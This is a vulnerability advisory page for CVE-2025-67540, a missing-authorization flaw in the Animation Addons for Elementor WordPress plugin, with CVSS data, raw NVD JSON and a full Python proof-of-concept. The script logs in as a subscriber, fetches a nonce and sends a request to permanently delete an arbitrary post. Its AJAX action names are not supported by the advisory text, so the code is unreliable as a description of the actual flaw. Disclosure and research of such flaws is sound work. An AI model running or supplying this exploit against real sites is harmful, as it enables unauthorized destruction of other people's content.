Security Vulnerability Report
中文
CVE-2025-67540 CVSS 6.5 MEDIUM

CVE-2025-67540

Published: 2025-12-09 16:18:29
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Wealcoder Animation Addons for Elementor animation-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Animation Addons for Elementor: from n/a through <= 2.4.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Animation Addons for Elementor <= 2.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67540 PoC - Animation Addons for Elementor Authorization Bypass # Affected: Animation Addons for Elementor <= 2.4.5 import requests import sys from urllib.parse import urlencode target_url = "http://target-wordpress-site.com" post_id_to_delete = 123 # Target post ID username = "subscriber_user" password = "user_password" def get_nonce(login_url, username, password): """Get WordPress nonce after authentication""" session = requests.Session() # Login to WordPress login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) # Extract nonce from plugin's AJAX handler nonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=animation_get_nonce" nonce_response = session.get(nonce_url) try: return session.cookies.get_dict(), nonce_response.json().get('nonce') except: return session.cookies.get_dict(), None def exploit_authorization_bypass(target_url, cookies, nonce, post_id): """Exploit the missing authorization vulnerability""" # Craft malicious request to delete arbitrary content delete_url = f"{target_url}/wp-admin/admin-ajax.php" payload = { 'action': 'animation_delete_content', 'nonce': nonce, 'post_id': post_id, 'delete_type': 'permanent' } print(f"[*] Sending deletion request for post ID: {post_id}") response = requests.post(delete_url, data=payload, cookies=cookies) if response.status_code == 200: result = response.json() if result.get('success'): print(f"[+] Successfully deleted post ID: {post_id}") return True print(f"[-] Exploitation failed") return False if __name__ == "__main__": login_url = f"{target_url}/wp-login.php" cookies, nonce = get_nonce(login_url, username, password) if nonce: exploit_authorization_bypass(target_url, cookies, nonce, post_id_to_delete) else: print("[-] Failed to obtain nonce")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67540", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:29.187", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Wealcoder Animation Addons for Elementor animation-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Animation Addons for Elementor: from n/a through <= 2.4.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/animation-addons-for-elementor/vulnerability/wordpress-animation-addons-for-elementor-plugin-2-4-5-arbitrary-content-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}